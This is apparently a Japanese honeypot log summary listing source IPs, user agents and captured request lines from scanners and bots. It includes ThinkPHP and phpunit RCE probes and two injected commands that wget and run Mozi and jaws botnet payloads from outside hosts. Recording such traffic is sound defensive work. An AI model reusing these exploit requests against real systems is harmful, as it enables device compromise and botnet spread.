
件数 送信元IPアドレス
1 3.25.141.247 United States
1 27.211.179.220 China
1 36.5.223.134 China
1 36.106.167.80 China
1 36.155.117.22 China
1 40.117.136.41 United States
11 45.146.164.125 Russia
1 49.113.96.151 China
1 49.113.103.206 China
1 51.103.86.106 United Kingdom
1 60.13.7.167 China
1 61.52.81.91 China
1 64.225.75.185 United States
123 83.135.213.244 Germany
1 97.107.140.232 United States
1 111.252.147.226 Taiwan
1 113.120.14.148 China
6 121.196.169.191 China
7 128.14.141.103 United States
1 150.255.32.31 China
1 150.255.33.170 China
3 163.172.161.118 United Kingdom
1 178.175.83.158 Albania
1 182.88.76.8 China
1 183.105.25.20 South Korea
1 183.136.225.12 China
1 183.136.225.14 China

UserAgent一覧

件数 UserAgent
11 -
2 Hello, World
6 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5; rv:58.0.2) Gecko/20100101 Firefox/58.0.2
6 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
122 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
4 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.01732016 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
4 PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3
1 python-requests/2.18.4

リクエスト内容一覧

件数 Method Request Protocol
1 -
7 \x16\x03\x01
1 CONNECT cn[.]bing[.]com/:443 HTTP/1.1
1 CONNECT www[.]baidu[.]com/:443 HTTP/1.1
1 CONNECT www[.]bing[.]com/:443 HTTP/1.1
1 CONNECT www[.]so[.]com/:443 HTTP/1.1
1 CONNECT www[.]voanews[.]com/:443 HTTP/1.1
4 GET /.env HTTP/1.1
2 GET /2phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
2 GET /PMA/index.php?lang=en HTTP/1.1
1 GET /PMA2012/index.php?lang=en HTTP/1.1
1 GET /PMA2013/index.php?lang=en HTTP/1.1
1 GET /PMA2014/index.php?lang=en HTTP/1.1
2 GET /PMA2015/index.php?lang=en HTTP/1.1
3 GET /PMA2016/index.php?lang=en HTTP/1.1
1 GET /PMA2017/index.php?lang=en HTTP/1.1
1 GET /PMA2020/index.php?lang=en HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /_phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /admin/db/index.php?lang=en HTTP/1.1
2 GET /admin/pMA/index.php?lang=en HTTP/1.1
3 GET /admin/phpmyadmin/index.php?lang=en HTTP/1.1
3 GET /admin/sqladmin/index.php?lang=en HTTP/1.1
2 GET /admin/sysadmin/index.php?lang=en HTTP/1.1
4 GET /admin/web/index.php?lang=en HTTP/1.1
1 GET /administrator/PMA/index.php?lang=en HTTP/1.1
1 GET /administrator/db/index.php?lang=en HTTP/1.1
1 GET /administrator/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /administrator/phpmyadmin/index.php?lang=en HTTP/1.1
2 GET /administrator/web/index.php?lang=en HTTP/1.1
1 GET /console/ HTTP/1.1
3 GET /database/index.php?lang=en HTTP/1.1
1 GET /db/index.php?lang=en HTTP/1.1
4 GET /db/myadmin/index.php?lang=en HTTP/1.1
1 GET /db/phpMyAdmin3/index.php?lang=en HTTP/1.1
1 GET /db/phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /db/webadmin/index.php?lang=en HTTP/1.1
1 GET /db/websql/index.php?lang=en HTTP/1.1
1 GET /dbadmin/index.php?lang=en HTTP/1.1
2 GET /favicon.ico HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /jenkins/login HTTP/1.1
1 GET /login HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /mysql/db/index.php?lang=en HTTP/1.1
2 GET /mysql/dbadmin/index.php?lang=en HTTP/1.1
3 GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1
1 GET /mysql/pma/index.php?lang=en HTTP/1.1
1 GET /mysql/web/index.php?lang=en HTTP/1.1
3 GET /phpMyAdmin-3/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin1/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin2/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin3/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin5/index.php?lang=en HTTP/1.1
1 GET /phpmy-admin/index.php?lang=en HTTP/1.1
1 GET /phpmy/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin1/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2013/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2015/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2016/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2017/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2018/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2019/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2021/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin3/index.php?lang=en HTTP/1.1
5 GET /phpmyadmin4/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin5/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin_/index.php?lang=en HTTP/1.1
1 GET /pma/index.php?lang=en HTTP/1.1
3 GET /pma2011/index.php?lang=en HTTP/1.1
1 GET /pma2012/index.php?lang=en HTTP/1.1
1 GET /pma2016/index.php?lang=en HTTP/1.1
1 GET /pma2017/index.php?lang=en HTTP/1.1
1 GET /pma2018/index.php?lang=en HTTP/1.1
1 GET /pma2019/index.php?lang=en HTTP/1.1
1 GET /pma2020/index.php?lang=en HTTP/1.1
3 GET /pma2021/index.php?lang=en HTTP/1.1
1 GET /program/index.php?lang=en HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//178[.]175[.]83[.]158:38079/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shell?cd+/tmp;rm+-rf+*;wget+ 116.202.106.221/jaws;sh+/tmp/jaws
2 GET /shopdb/index.php?lang=en HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
3 GET /sql/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /sql/phpmanager/index.php?lang=en HTTP/1.1
1 GET /sql/phpmyadmin2/index.php?lang=en HTTP/1.1
1 GET /sql/sql/index.php?lang=en HTTP/1.1
2 GET /sql/sqladmin/index.php?lang=en HTTP/1.1
1 GET /sql/sqlweb/index.php?lang=en HTTP/1.1
1 GET /sql/webadmin/index.php?lang=en HTTP/1.1
1 GET /sql/webdb/index.php?lang=en HTTP/1.1
3 GET /sqlmanager/index.php?lang=en HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET /wp-login.php HTTP/1.1
1 GET http[:]//dongtaiwang[.]com/ HTTP/1.1
1 GET http[:]//welcome[.]vnet[.]cn/ HTTP/1.0
1 GET http[:]//www[.]bing[.]com/ HTTP/1.1
1 GET http[:]//www[.]epochtimes[.]com/ HTTP/1.1
1 GET http[:]//www[.]minghui[.]org/ HTTP/1.1
1 GET http[:]//www[.]soso[.]com/ HTTP/1.1
1 GET http[:]//www[.]wujieliulan[.]com/ HTTP/1.1
1 HEAD http[:]//110[.]242[.]68[.]4/ HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
2 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /_ignition/execute-solution HTTP/1.1
1 POST /api/jsonws/invoke HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST http[:]//blacksun[.]site/11b630354527c149e306fe30adf20b39c78fd1c87c849f7a961b13f33ff4c365409ae333485d09dfbc7d75d552c347fc567066a6b8bcdcdcd342870677aa0991b1f0f24281ea6329dbbb79ab6442eb72a00308a46b5a34e7f91f194b12b69175 HTTP/1.1